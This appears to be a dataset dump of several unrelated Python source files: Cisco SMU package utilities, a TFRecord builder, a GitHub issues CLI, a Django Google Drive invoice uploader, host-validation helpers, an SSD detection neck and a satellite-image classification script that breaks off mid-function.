text stringlengths 957 885k |
|---|
<filename>csmserver/smu_utils.py
# =============================================================================
# Copyright (c) 2016, Cisco Systems, Inc
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
# =============================================================================
from database import DBSession
from constants import UNKNOWN
from constants import PackageType
from smu_info_loader import SMUInfoLoader
from smu_advisor import get_excluded_supersede_list
from smu_advisor import get_missing_required_prerequisites
from smu_advisor import get_dict_from_list
from utils import multiple_replace
SMU_INDICATOR = 'CSC'
SP_INDICATOR = '.sp'
TAR_INDICATOR = 'iosxr'
def get_package_type(name):
"""
Returns the package type. Available package types are defined in PackageType.
Only ASR9K supports Service Packs concept
Example: asr9k-px-4.3.2.sp-1.0.0 or asr9k-px-4.3.2.k9-sp-1.0.0
"""
if name.find(SMU_INDICATOR) != -1:
return PackageType.SMU
elif name.find(SP_INDICATOR) != -1:
return PackageType.SERVICE_PACK
elif name.find(TAR_INDICATOR) != -1:
return PackageType.SOFTWARE
else:
return PackageType.PACKAGE
def get_smu_lookup_name(name):
"""
Given a package name, try to derive a name which can be used to lookup a SMU or SP
in the SMU meta file.
However, there is no guarantee that the correct name can be derived. That depends
on the given name if it is within the parsing criteria.
"""
name = name.strip()
package_type = get_package_type(name)
if package_type != PackageType.SMU and package_type != PackageType.SERVICE_PACK:
return name
# The worst case scenario of the name could be "disk0:asr9k-px-4.2.1.CSCud90009-1.0.0.pie"
# .smu is for NCS6K, .rpm is for ASR9K-X64
rep_dict = {'.pie': '', '.smu': '', '.rpm': ''}
name = multiple_replace(name, rep_dict)
# Skip the location string if found
pos = name.find(':')
if pos != -1:
name = name[pos+1:]
# For SMU, the resultant name needs to be in this format: "asr9k-px-4.2.1.CSCud90009".
# However, on the device, the SMU is in this format: "asr9k-px-4.2.1.CSCud90009-1.0.0".
pos = name.find(SMU_INDICATOR)
if pos != -1:
# Strip the -1.0.0 string if found
try:
# index may throw ValueError if substring not found
pos2 = name.index('-', pos)
if pos2 != -1:
name = name[:pos2]
except:
pass
return name
def union_set_from_dict(smu_info_dict):
"""
The smu_info_dict has the following format
smu name -> set()
"""
result_set = set()
for smu_set in smu_info_dict.values():
result_set = result_set.union(smu_set)
return result_set
def get_missing_prerequisite_list(smu_loader, smu_name_list):
"""
:param smu_loader: A valid SMUInfoLoader instance
:param smu_name_list: A list of SMU names. For example,
asr9k-px-6.1.3.CSCvd54775
ncs5500-6.1.3.CSCvd07722
:return: Returns a list SMU names that are the missing pre-requisites if any.
"""
result_list = []
if smu_loader.is_valid:
smu_info_dict = dict()
for smu_name in smu_name_list:
smu_info = smu_loader.get_smu_info(smu_name)
if smu_info is not None:
smu_info_dict[smu_name] = smu_info
if len(smu_info_dict) > 0:
# Exclude all the superseded SMUs in smu_info_list
excluded_supersede_list = get_excluded_supersede_list(smu_info_dict.values())
missing_required_prerequisite_dict = \
get_missing_required_prerequisites(smu_loader, excluded_supersede_list)
missing_required_prerequisite_set = union_set_from_dict(missing_required_prerequisite_dict)
for pre_requisite_smu in missing_required_prerequisite_set:
result_list.append(pre_requisite_smu)
return result_list
def get_peer_packages(db_session, smu_loader, package_name):
"""
On eXR platforms, a SMU may contain multiple RPMs. Not only does CSM need
to check for missing pre-requisite, but also missing peers in the same SMU.
:param db_session: A DBSession instance
:param smu_loader: A SMUInfoLoader instance
:param package_name: A package name
:return: Returns the peer packages
"""
smu_name = SMUInfoLoader.get_smu_name_from_package_name(db_session, package_name=package_name)
smu_info = smu_loader.get_smu_info(smu_name)
if smu_info is not None:
return smu_info.package_names.split(',')
return []
def get_smu_info_dict(db_session, smu_loader, package_list):
"""
Given a package list, return a dictionary. If a package name cannot be resolved to a SMU name, its value will be None.
:param db_session: A DBSession instance
:param smu_loader: A SMUInfoLoader instance
:param package_list: A list of package names
asr9k-px-6.1.3.CSCvd54775.pie
ncs5500-k9sec-2.2.0.2-r613.CSCvd18741.x86_64.rpm
:return: A dictionary
key: package_name, value: SMUInfo
"""
smu_info_dict = dict()
for package_name in package_list:
smu_name = SMUInfoLoader.get_smu_name_from_package_name(db_session, package_name=package_name)
smu_info_dict[package_name] = smu_loader.get_smu_info(smu_name)
return smu_info_dict
def get_optimized_list(package_to_optimize_list):
"""
Returns the validated list given the SMU/SP list.
A smu_list may contain packages, SMUs, SPs, or junk texts.
"""
unrecognized_list = []
package_list = []
result_list = []
db_session = DBSession()
missing_peer_packages_dict = dict()
smu_loader = SMUInfoLoader.get_loader_from_package(package_to_optimize_list)
if smu_loader.is_valid:
smu_info_list = set()
smu_info_dict = get_smu_info_dict(DBSession(), smu_loader, package_to_optimize_list)
for package_name, smu_info in smu_info_dict.items():
if smu_info is None:
# Check if the entry is a package type
platform, release = SMUInfoLoader.get_platform_and_release(package_name)
if platform == UNKNOWN:
unrecognized_list.append(package_name)
else:
package_list.append(package_name)
else:
smu_info_list.add(smu_info)
if len(smu_info_list) > 0:
# Exclude all the superseded SMUs in smu_info_list
excluded_supersede_list = get_excluded_supersede_list(smu_info_list)
missing_required_prerequisite_dict = \
get_missing_required_prerequisites(smu_loader, excluded_supersede_list)
missing_required_prerequisite_set = union_set_from_dict(missing_required_prerequisite_dict)
for pre_requisite_smu in missing_required_prerequisite_set:
pre_requisite_smu_info = smu_loader.get_smu_info(pre_requisite_smu)
description = pre_requisite_smu_info.description if pre_requisite_smu_info is not None else ''
for package_name in pre_requisite_smu_info.package_names.split(','):
result_list.append({'software_package': package_name,
'is': 'Pre-requisite', 'description': description})
excluded_supersede_dict = get_dict_from_list(excluded_supersede_list)
for smu_info in smu_info_list:
if smu_info.name not in excluded_supersede_dict:
for package_name in smu_info.package_names.split(','):
result_list.append({'software_package': package_name,
'is': 'Superseded', 'description': smu_info.description})
else:
for package_name in smu_info.package_names.split(','):
result_list.append({'software_package': package_name,
'is': 'SMU/SP', 'description': smu_info.description})
if len(package_list) > 0:
for package_name in package_list:
result_list.append({'software_package': package_name, 'is': 'Package', 'description': ''})
if len(unrecognized_list) > 0:
for package_name in unrecognized_list:
result_list.append({'software_package': package_name, 'is': 'Unrecognized', 'description': ''})
else:
for package_name in package_to_optimize_list:
result_list.append({'software_package': package_name, 'is': 'Unrecognized', 'description': ''})
return result_list
if __name__ == '__main__':
pass |
<gh_stars>1-10
"""
Toy data tf records cats vs dogs
"""
import tensorflow as tf
import imageio
import numpy as np
import sys
import glob
import param_gedi as param
import os
import cv2
import matplotlib.pyplot as plt
class Record:
def __init__(self, images_dir_A, images_dir_B, tfrecord_dir, split):
cats = []
dogs = []
self.tfrecord_dir = tfrecord_dir
_files = glob.glob(os.path.join('/mnt/finkbeinerlab/robodata/Josh/dogs_vs_cats/train/*.jpg'))
for f in _files:
parts = f.split('/')[-1].split('.')
if parts[0] == 'cat':
cats.append(f)
elif parts[0] == 'dog':
dogs.append(f)
np.random.shuffle(cats)
np.random.shuffle(dogs)
self.impaths_A = list(cats)
self.impaths_B = list(dogs)
label_A = 1
label_B = 0
self.labels_A = np.int16(np.ones(len(self.impaths_A)) * label_A)
self.labels_B = np.int16(np.ones(len(self.impaths_B)) * label_B)
self._impaths = np.array(self.impaths_A + self.impaths_B)
self._labels = np.append(self.labels_A, self.labels_B)
assert len(self._impaths) == len(self._labels), 'Length of images and labels do not match.'
assert len(self.impaths_A) + len(self.impaths_B) == len(
self._impaths), 'Summed lengths of image paths do not match'
self.shuffled_idx = np.arange(len(self._impaths))
np.random.seed(0)
np.random.shuffle(self.shuffled_idx)
print(self.shuffled_idx)
self.impaths = self._impaths[self.shuffled_idx]
self.labels = self._labels[self.shuffled_idx]
assert self.impaths[0] != self._impaths[0], 'check randomization'
length = len(self.impaths)
self.trainpaths = self.impaths[:int(length*split[0])]
self.valpaths = self.impaths[int(length*split[0]):int(length * (split[0] + split[1]))]
self.testpaths = self.impaths[int(length * (split[0] + split[1])):]
self.trainlbls = self.labels[:int(length*split[0])]
self.vallbls = self.labels[int(length*split[0]):int(length * (split[0] + split[1]))]
self.testlbls = self.labels[int(length * (split[0] + split[1])):]
def load_image(self, im_path):
img = cv2.imread(im_path)
img = cv2.resize(img, (224,224), interpolation=cv2.INTER_LINEAR)
# plt.imshow(img)
# plt.show()
# assume it's the correct size, otherwise resize here
img = img.astype(np.float32)
return img
def _int64_feature(self, value):
return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))
def _bytes_feature(self, value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def tiff2record(self, tf_data_name, filepaths, labels):
"""
Generates tfrecord in a loop.
Args:
tf_data_name: name of tfrecord file
Returns:
"""
assert len(filepaths)==len(labels), 'len of filepaths and labels do not match {} {}'.format(len(filepaths), len(labels))
with tf.io.TFRecordWriter(os.path.join(self.tfrecord_dir, tf_data_name)) as writer:
for i in range(len(filepaths)):
# one less in range for matching pairs
if not i % 100:
print('Train data:', i) # Python 3 has default end = '\n' which flushes the buffer
# sys.stdout.flush()
filename = str(filepaths[i])
img = self.load_image(filename)
label = labels[i]
filename = str(filename)
filename = str.encode(filename)
# feature = {'label': self._int64_feature(label),
# 'image': self._bytes_feature(tf.compat.as_bytes(img.tostring())),
# 'filename': self._bytes_feature(filename)}
feature = {'image': self._bytes_feature(tf.compat.as_bytes(img.tostring())),
'label': self._int64_feature(label)}
example = tf.train.Example(features=tf.train.Features(feature=feature))
writer.write(example.SerializeToString())
print('Saved to ' + os.path.join(self.tfrecord_dir, tf_data_name))
sys.stdout.flush()
if __name__ == '__main__':
p = param.Param()
pos_dir = '/mnt/data/MJFOX/Crops/positive/DNE'
neg_dir = '/mnt/data/MJFOX/Crops/negative/DNE'
split = [.7, .15, .15]
Rec = Record(pos_dir, neg_dir, p.tfrecord_dir, split)
savetrain = os.path.join(p.tfrecord_dir, 'train_catsdogs.tfrecord')
saveval = os.path.join(p.tfrecord_dir, 'val_catsdogs.tfrecord')
savetest = os.path.join(p.tfrecord_dir, 'test_catsdogs.tfrecord')
Rec.tiff2record(savetrain, Rec.trainpaths, Rec.trainlbls)
Rec.tiff2record(saveval, Rec.valpaths, Rec.vallbls)
Rec.tiff2record(savetest, Rec.testpaths, Rec.testlbls) |
<filename>gitissues/cli.py
import click
import configparser
from .utils import authenticate, get_config_path, get_token, get_repo_name
from tabulate import tabulate
from .classes import Github, GithubIssue
from .colour import COLOR
@click.group()
def cli():
"""
A command line interface to manage all your git issues at one place
"""
pass
@cli.command()
@click.option("-t", "--token", help="personal access token unique to you. Requires repo, read:org permissions")
def login(token):
"""
gets token from the user to perform authenticated api calls
"""
if token is None:
token = click.prompt("Tip: You can generate your personal access token at https://github.com/settings/tokens\nToken", hide_input=True)
config = configparser.ConfigParser()
config['github-user'] = {'token': token}
with open(get_config_path(), 'w') as configfile:
config.write(configfile)
@cli.command()
@click.option("-r", "--repo", help = "github repository in format username/repo", default=None)
@click.option("-t", "--title", help = "issue title", default=None)
@click.option("-b", "--body", help = "description of the issue", default=None)
@click.option("-l", "--labels", help = "issue labels. add multiple labels by specifying the option again.", default=None, multiple=True)
@click.option("-a", "--assignees", help = "users to assign. add multiple usernames by specifying the option again.", default=None, multiple=True)
def create(repo, title, body, labels, assignees):
"""
create an issue on a github repo
"""
authenticate()
token = get_token()
repository = get_repo_name(repo)
if title == None:
title = click.prompt("An issue title is mandatory.\nTitle")
g = Github(token)
repo = g.get_repo(repository)
issue = repo.create_issue(title=title, body=body, labels=labels, assignees=assignees)
print(f"Issue #{issue.number} Created Successfully in {repository}\n\n{issue.html_url}")
@cli.command()
@click.argument("number", type=int)
@click.option("-r", "--repo", help = "github repository in format username/repo", default=None)
def close(repo, number):
"""
close an issue on a github repo
"""
authenticate()
token = get_token()
repository = get_repo_name(repo)
g = Github(token)
repo = g.get_repo(repository)
issue = repo.get_issue(number)
issue.close_issue()
print(f"Issue #{issue.number} Closed Successfully in {repository}\n\n{issue.html_url}")
@cli.command()
@click.argument("number", type=int)
@click.option("-r", "--repo", help = "github repository in format username/repo", default=None)
def reopen(repo, number):
"""
reopen an issue on a github repo
"""
authenticate()
token = get_token()
repository = get_repo_name(repo)
g = Github(token)
repo = g.get_repo(repository)
issue = repo.get_issue(number)
issue.reopen_issue()
print(f"Issue #{issue.number} Reopened Successfully in {repository}\n\n{issue.html_url}")
@cli.command()
@click.argument("number", type=int)
@click.option("-b", "--body", help = "comment body", default=None)
@click.option("-r", "--repo", help = "github repository in format username/repo", default=None)
def comment(body, repo, number):
"""
create a new comment on a github issue
"""
authenticate()
token = get_token()
repository = get_repo_name(repo)
if body == None:
body = click.prompt("Issue comment requires a body.\nComment")
g = Github(token)
repo = g.get_repo(repository)
issue = repo.get_issue(number)
comment = issue.create_comment(body=body)
print(f"Comment created in issue #{issue.number} in {repository}\n\n{comment['html_url']}")
@cli.command()
@click.argument("number", type=int)
@click.option("-r", "--repo", help = "github repository in format username/repo", default=None)
@click.option("-t", "--title", help = "issue title", default=None)
@click.option("-b", "--body", help = "description of the issue", default=None)
@click.option("-s", "--state", help = "state of the issue. can be one of open or closed", type=click.Choice(['open', 'closed'], case_sensitive=False), default=None)
@click.option("-l", "--labels", help = "issue labels. add multiple labels by specifying the option again.", default=None, multiple=True)
@click.option("-a", "--assignees", help="users to assign. add multiple usernames by specifying the option again.", default=None, multiple=True)
def update(number, repo, title, body, state, labels, assignees):
"""
update an issue on a github repo
"""
authenticate()
token = get_token()
repository = get_repo_name(repo)
g = Github(token)
repo = g.get_repo(repository)
issue = repo.get_issue(number)
issue.update_issue(title=title, body=body, labels=labels, assignees=assignees, state=state)
print(f"Issue #{issue.number} updated successfully in {repository}\n\n{issue.html_url}")
@cli.command()
@click.option("-r", "--repo", help = "github repository in format username/repo", default=None)
@click.option("-s", "--state", help = "state of the issue. can be one of open, closed or all",
type=click.Choice(['open', 'closed', 'all'], case_sensitive=False), default='open')
@click.option("-a", "--author", help="filter by author", default=None)
def list(repo, state, author):
"""
list issues of a github repo
"""
authenticate()
token = get_token()
repository = get_repo_name(repo)
g = Github(token)
repo = g.get_repo(repository)
table = []
issues = repo.get_issues(params={'state':state, 'creator':author})
for issue in issues:
table.append(issue.get_table_attrs())
if len(issues) == 0:
print(f"No {'open' if state == 'all' else ''} issues found in {repository}.")
print(tabulate(table, tablefmt="github"))
@cli.command()
@click.argument("number", type=int)
@click.option("-r", "--repo", help = "github repository in format username/repo", default=None)
def view(repo, number):
"""
view an issue on a github repo
"""
authenticate()
token = get_token()
repository = get_repo_name(repo)
g = Github(token)
repo = g.get_repo(repository)
issue = repo.get_issue(number)
print(f"{COLOR['BOLD']}{issue.title}{COLOR['ENDC']} \u2022 {issue.state}\n")
if issue.body:
print(f"{issue.body}")
if issue.labels:
labels = ", ".join([label for label in issue.labels])
print(f"\nLabels: {COLOR['BLUE']}{labels}{COLOR['ENDC']}")
if issue.assignees:
assignees = ", ".join([assignee for assignee in issue.assignees])
print(f"Assignees: {COLOR['GREEN']}{assignees}{COLOR['ENDC']}")
print(f"\nCreated {issue.created}")
print(f"\nLink: {issue.html_url}\n")
@cli.command()
@click.argument("number", type=int)
@click.option("-r", "--repo", help = "github repository in format username/repo", default=None)
@click.option("-l", "--lock-reason", help="reason to lock the issue",
type=click.Choice(['off topic', 'too heated', 'resolved', 'spam'], case_sensitive=False), default=None)
def lock(number, repo, lock_reason):
"""
lock an issue. requires push access.
must provide one of the reasons for lock
- off topic, too heated, resolved, spam
"""
if lock_reason is None:
lock_reason = click.prompt("A lock reason must be specified. Lock Reason",
type=click.Choice(['off topic', 'too heated', 'resolved', 'spam'], case_sensitive=False))
authenticate()
token = get_token()
repository = get_repo_name(repo)
g = Github(token)
repo = g.get_repo(repository)
issue = repo.get_issue(number)
issue.lock_issue(lock_reason=lock_reason)
print(f"Issue #{issue.number} Locked in {repository}")
@cli.command()
@click.argument("number", type=int)
@click.option("-r", "--repo", help = "github repository in format username/repo", default=None)
def unlock(number, repo):
"""
unlock an issue.
requires push access.
"""
authenticate()
token = get_token()
repository = get_repo_name(repo)
g = Github(token)
repo = g.get_repo(repository)
issue = repo.get_issue(number)
issue.unlock_issue()
print(f"Issue #{issue.number} unlocked in {repository}")
if __name__ == '__main__':
cli() |
import shutil
import tempfile
import os
import os.path
from django.core.management.base import BaseCommand
from django.core.files.storage import default_storage
from django.utils import timezone
from events.models import Expense
from utils import gdrive
# https://drive.google.com/drive/u/0/folders/1Kvfmz1eTNd9y2ZAqosaN3Cn2ydUKjtN_
BASE_FOLDER = '1Kvfmz1eTNd9y2ZAqosaN3Cn2ydUKjtN_'
# folder names in function of invoice type
FOLDER_TYPE_NAMES = {
Expense.INVOICE_TYPE_A: 'Facturas A',
Expense.INVOICE_TYPE_B: 'Facturas B',
Expense.INVOICE_TYPE_C: 'Facturas C',
Expense.INVOICE_TYPE_TICKET: 'Tickets',
Expense.INVOICE_TYPE_OTHER: 'Otros',
}
# to avoid messing with gdrive every time
DIR_CACHE = {}
FILES_CACHE = {}
def ensure_directory(explorer, parent_id, dirname):
"""Ensure 'dirname' directory is present in 'parent'."""
cache_key = (parent_id, dirname)
if cache_key in DIR_CACHE:
return DIR_CACHE[cache_key]
for folder in explorer.list_folder(parent_id):
if folder['name'] == dirname:
folder_id = folder['id']
break
else:
print("Creating folder {!r} in parent {}".format(dirname, parent_id))
folder_id = explorer.create_folder(dirname, parent_id)
DIR_CACHE[cache_key] = folder_id
return folder_id
def get_files(explorer, folder_id):
"""Get files info for a specific folder, cached."""
try:
files = FILES_CACHE[folder_id]
except KeyError:
files = {f['name']: f for f in explorer.list_folder(folder_id)}
FILES_CACHE[folder_id] = files
return files
class Command(BaseCommand):
help = "Upload those invoices type A to gdrive"
def add_arguments(self, parser):
parser.add_argument('yearmonth', type=str, nargs='?')
def handle(self, *args, **options):
yearmonth = options['yearmonth']
if yearmonth is None:
# by default is "last month"
now = timezone.now()
year = now.year
month = now.month - 1
if month <= 0:
year -= 1
month = 12
else:
if len(yearmonth) != 6 or not yearmonth.isdigit():
print("USAGE: upload_gdrive_invoices.py [YYYYMM]")
exit()
year = int(yearmonth[:4])
month = int(yearmonth[4:])
print("Filtering expenses for year={!r} month={!r}".format(year, month))
expenses = Expense.objects.filter(
invoice_date__year=year,
invoice_date__month=month,
).all()
print("Found {} expenses".format(len(expenses)))
# ensure needed dirs are present in google drive
explorer = gdrive.Explorer()
yearmonth_foldername = "{}{:02d}".format(year, month)
base_folder_id = ensure_directory(explorer, BASE_FOLDER, yearmonth_foldername)
for exp in expenses:
# build useful vars for later
orig_name = os.path.basename(exp.invoice.name)
extension = orig_name.rsplit('.')[-1].lower()
dest_filename = "{:%Y%m%d} - {}: {} [${}] ({}).{}".format(
exp.invoice_date, exp.event.name, exp.description,
exp.amount, orig_name, extension)
dest_foldername_inv_type = FOLDER_TYPE_NAMES[exp.invoice_type]
print("Processing", repr(dest_filename))
# ensure dir in google drive, see if file is already there
folder_id = ensure_directory(explorer, base_folder_id, dest_foldername_inv_type)
old_files = get_files(explorer, folder_id)
if dest_filename in old_files:
old_info = old_files[dest_filename]
if int(old_info['size']) == default_storage.size(exp.invoice.name):
print(" ignoring, already updated")
continue
print(" different size, uploading again")
# download the invoice content to a local temp file (flush at the end so all content is
# available externally, and only after using it close it, as it will then removed)
local_temp_fh = tempfile.NamedTemporaryFile(mode='wb')
remote_fh = default_storage.open(exp.invoice.name)
shutil.copyfileobj(remote_fh, local_temp_fh)
local_temp_fh.flush()
# upload
explorer.upload(local_temp_fh.name, folder_id, filename=dest_filename)
local_temp_fh.close()
print(" uploaded")
|
import typing as t
from .._internal import _encode_idna
from ..exceptions import SecurityError
from ..urls import uri_to_iri, url_quote
def host_is_trusted(hostname: str, trusted_list: t.Iterable[str]) -> bool:
"""Check if a host matches a list of trusted names.
:param hostname: The name to check.
:param trusted_list: A list of valid names to match. If a name
starts with a dot it will match all subdomains.
.. versionadded:: 0.9
"""
if not hostname:
return False
if isinstance(trusted_list, str):
trusted_list = [trusted_list]
def _normalize(hostname: str) -> bytes:
if ":" in hostname:
hostname = hostname.rsplit(":", 1)[0]
return _encode_idna(hostname)
try:
hostname_bytes = _normalize(hostname)
except UnicodeError:
return False
for ref in trusted_list:
if ref.startswith("."):
ref = ref[1:]
suffix_match = True
else:
suffix_match = False
try:
ref_bytes = _normalize(ref)
except UnicodeError:
return False
if ref_bytes == hostname_bytes:
return True
if suffix_match and hostname_bytes.endswith(b"." + ref_bytes):
return True
return False
def get_host(
scheme: str,
host_header: t.Optional[str],
server: t.Optional[t.Tuple[str, t.Optional[int]]] = None,
trusted_hosts: t.Optional[t.Iterable[str]] = None,
) -> str:
"""Return the host for the given parameters.
This first checks the ``host_header``. If it's not present, then
``server`` is used. The host will only contain the port if it is
different than the standard port for the protocol.
Optionally, verify that the host is trusted using
:func:`host_is_trusted` and raise a
:exc:`~werkzeug.exceptions.SecurityError` if it is not.
:param scheme: The protocol the request used, like ``"https"``.
:param host_header: The ``Host`` header value.
:param server: Address of the server. ``(host, port)``, or
``(path, None)`` for unix sockets.
:param trusted_hosts: A list of trusted host names.
:return: Host, with port if necessary.
:raise ~werkzeug.exceptions.SecurityError: If the host is not
trusted.
"""
host = ""
if host_header is not None:
host = host_header
elif server is not None:
host = server[0]
if server[1] is not None:
host = f"{host}:{server[1]}"
if scheme in {"http", "ws"} and host.endswith(":80"):
host = host[:-3]
elif scheme in {"https", "wss"} and host.endswith(":443"):
host = host[:-4]
if trusted_hosts is not None:
if not host_is_trusted(host, trusted_hosts):
raise SecurityError(f"Host {host!r} is not trusted.")
return host
def get_current_url(
scheme: str,
host: str,
root_path: t.Optional[str] = None,
path: t.Optional[str] = None,
query_string: t.Optional[bytes] = None,
) -> str:
"""Recreate the URL for a request. If an optional part isn't
provided, it and subsequent parts are not included in the URL.
The URL is an IRI, not a URI, so it may contain Unicode characters.
Use :func:`~werkzeug.urls.iri_to_uri` to convert it to ASCII.
:param scheme: The protocol the request used, like ``"https"``.
:param host: The host the request was made to. See :func:`get_host`.
:param root_path: Prefix that the application is mounted under. This
is prepended to ``path``.
:param path: The path part of the URL after ``root_path``.
:param query_string: The portion of the URL after the "?".
"""
url = [scheme, "://", host]
if root_path is None:
url.append("/")
return uri_to_iri("".join(url))
url.append(url_quote(root_path.rstrip("/")))
url.append("/")
if path is None:
return uri_to_iri("".join(url))
url.append(url_quote(path.lstrip("/")))
if query_string:
url.append("?")
url.append(url_quote(query_string, safe=":&%=+$!*'(),"))
return uri_to_iri("".join(url))
|
<reponame>VietDunghacker/VarifocalNet
import torch
import torch.nn as nn
from mmcv.cnn import ConvModule, DepthwiseSeparableConvModule
from ..builder import NECKS
@NECKS.register_module()
class SSDNeck(nn.Module):
"""Extra layers of SSD backbone to generate multi-scale feature maps.
Args:
in_channels (Sequence[int]): Number of input channels per scale.
out_channels (Sequence[int]): Number of output channels per scale.
level_strides (Sequence[int]): Stride of 3x3 conv per level.
level_paddings (Sequence[int]): Padding size of 3x3 conv per level.
l2_norm_scale (float|None): L2 normalization layer init scale.
If None, not use L2 normalization on the first input feature.
last_kernel_size (int): Kernel size of the last conv layer.
Default: 3.
use_depthwise (bool): Whether to use DepthwiseSeparableConv.
Default: False.
conv_cfg (dict): Config dict for convolution layer. Default: None.
norm_cfg (dict): Dictionary to construct and config norm layer.
Default: None.
act_cfg (dict): Config dict for activation layer.
Default: dict(type='ReLU').
init_cfg (dict or list[dict], optional): Initialization config dict.
"""
def __init__(self,
in_channels,
out_channels,
level_strides,
level_paddings,
l2_norm_scale=20.,
last_kernel_size=3,
use_depthwise=False,
conv_cfg=None,
norm_cfg=None,
act_cfg=dict(type='ReLU'),
init_cfg=[
dict(
type='Xavier', distribution='uniform',
layer='Conv2d'),
dict(type='Constant', val=1, layer='BatchNorm2d'),
]):
super(SSDNeck, self).__init__(init_cfg)
assert len(out_channels) > len(in_channels)
assert len(out_channels) - len(in_channels) == len(level_strides)
assert len(level_strides) == len(level_paddings)
assert in_channels == out_channels[:len(in_channels)]
if l2_norm_scale:
self.l2_norm = L2Norm(in_channels[0], l2_norm_scale)
self.init_cfg += [
dict(
type='Constant',
val=self.l2_norm.scale,
override=dict(name='l2_norm'))
]
self.extra_layers = nn.ModuleList()
extra_layer_channels = out_channels[len(in_channels):]
second_conv = DepthwiseSeparableConvModule if \
use_depthwise else ConvModule
for i, (out_channel, stride, padding) in enumerate(
zip(extra_layer_channels, level_strides, level_paddings)):
kernel_size = last_kernel_size \
if i == len(extra_layer_channels) - 1 else 3
per_lvl_convs = nn.Sequential(
ConvModule(
out_channels[len(in_channels) - 1 + i],
out_channel // 2,
1,
conv_cfg=conv_cfg,
norm_cfg=norm_cfg,
act_cfg=act_cfg),
second_conv(
out_channel // 2,
out_channel,
kernel_size,
stride=stride,
padding=padding,
conv_cfg=conv_cfg,
norm_cfg=norm_cfg,
act_cfg=act_cfg))
self.extra_layers.append(per_lvl_convs)
def forward(self, inputs):
"""Forward function."""
outs = [feat for feat in inputs]
if hasattr(self, 'l2_norm'):
outs[0] = self.l2_norm(outs[0])
feat = outs[-1]
for layer in self.extra_layers:
feat = layer(feat)
outs.append(feat)
return tuple(outs)
class L2Norm(nn.Module):
def __init__(self, n_dims, scale=20., eps=1e-10):
"""L2 normalization layer.
Args:
n_dims (int): Number of dimensions to be normalized
scale (float, optional): Defaults to 20..
eps (float, optional): Used to avoid division by zero.
Defaults to 1e-10.
"""
super(L2Norm, self).__init__()
self.n_dims = n_dims
self.weight = nn.Parameter(torch.Tensor(self.n_dims))
self.eps = eps
self.scale = scale
def forward(self, x):
"""Forward function."""
# normalization layer convert to FP32 in FP16 training
x_float = x.float()
norm = x_float.pow(2).sum(1, keepdim=True).sqrt() + self.eps
return (self.weight[None, :, None, None].float().expand_as(x_float) *
x_float / norm).type_as(x)
|
<reponame>dymaxionlabs/satlomas-back
import os
import shutil
from django.conf import settings
from eo_sensors.utils import run_otb_command
RESULTS_DIR = os.path.join(settings.BASE_DIR, "data", "images", "results")
RESULTS_SRC = os.path.join(RESULTS_DIR, "src")
RESULTS_FEAT = os.path.join(RESULTS_DIR, "feats")
MODEL_PATH = os.path.join(settings.BASE_DIR, "data", "rf_model.yaml")
SRTM_DEM_PATH = os.path.join(settings.BASE_DIR, "data", "srtm_dem.tif")
def predict(period):
date_from = period.date_from
date_to = period.date_to
period = "{}{}_{}{}".format(
date_from.year, date_from.month, date_to.year, date_to.month
)
s2_10m = "s2_{}_10m".format(period)
s2_20m = "s2_{}_20m".format(period)
s1 = "s1_{}".format(period)
srtm = "srtm_dem"
shutil.copyfile(
os.path.join(RESULTS_SRC, "{}.tif".format(s2_10m)),
os.path.join(RESULTS_FEAT, "{}.tif".format(s2_10m)),
)
superimpose(s2_20m, s2_10m)
superimpose(s1, s2_10m)
shutil.copyfile(SRTM_DEM_PATH, os.path.join(RESULTS_SRC, "{}.tif".format(srtm)))
superimpose(srtm, s2_10m)
for b in range(1, 9):
extract_local_stats(s2_10m, b)
extract_haralick(s2_10m, b)
for b in range(1, 7):
extract_local_stats(s2_20m, b)
extract_haralick(s2_20m, b)
for b in range(1, 4):
extract_local_stats(s1, b)
extract_haralick(s1, b)
extract_local_stats(srtm, 1)
extract_haralick(srtm, 1)
concatenate_images()
classify_image()
def superimpose(inm, inr):
run_otb_command(
"otbcli_Superimpose -inr {inr} -inm {inm} -out {out}".format(
inr=os.path.join(RESULTS_SRC, "{}.tif".format(inr)),
inm=os.path.join(RESULTS_SRC, "{}.tif".format(inm)),
out=os.path.join(RESULTS_FEAT, "{}.tif".format(inm)),
)
)
def extract_local_stats(name, band):
run_otb_command(
"otbcli_LocalStatisticExtraction -in {input} -channel {band} -radius 3 -out {out}".format(
input=os.path.join(RESULTS_FEAT, "{}.tif".format(name)),
band=band,
out=os.path.join(RESULTS_FEAT, "local_stats_{}_{}.tif".format(name, band)),
)
)
def extract_haralick(name, band):
run_otb_command(
"otbcli_HaralickTextureExtraction -in {input} -channel {band} -texture simple -parameters.min 0 -parameters.max 0.3 -out {out}".format(
input=os.path.join(RESULTS_FEAT, "{}.tif".format(name)),
band=band,
out=os.path.join(RESULTS_FEAT, "haralick_{}_{}.tif".format(name, band)),
)
)
def concatenate_images():
current_dir = os.getcwd()
os.chdir(RESULTS_FEAT)
run_otb_command(
"otbcli_ConcatenateImages -il $(ls {il}) -out {out}".format(
il=RESULTS_FEAT,
out=os.path.join(RESULTS_DIR, "features.tif"),
)
)
os.chdir(current_dir)
def classify_image():
run_otb_command(
"otbcli_ImageClassifier -in {input} -model {model} -out {out}".format(
